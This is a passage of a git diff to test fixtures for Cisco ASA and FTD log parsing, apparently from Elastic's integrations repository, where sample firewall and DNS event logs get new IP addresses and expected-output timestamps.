[0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605211800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20863,8 +20863,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20898,7 +20898,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20907,8 +20907,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:25.095246300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:32:20.605217200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log index ce15fb2bdfa..996a1347fea 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log @@ -1,21 +1,21 @@ -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299, DNSResponseType: No error +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, 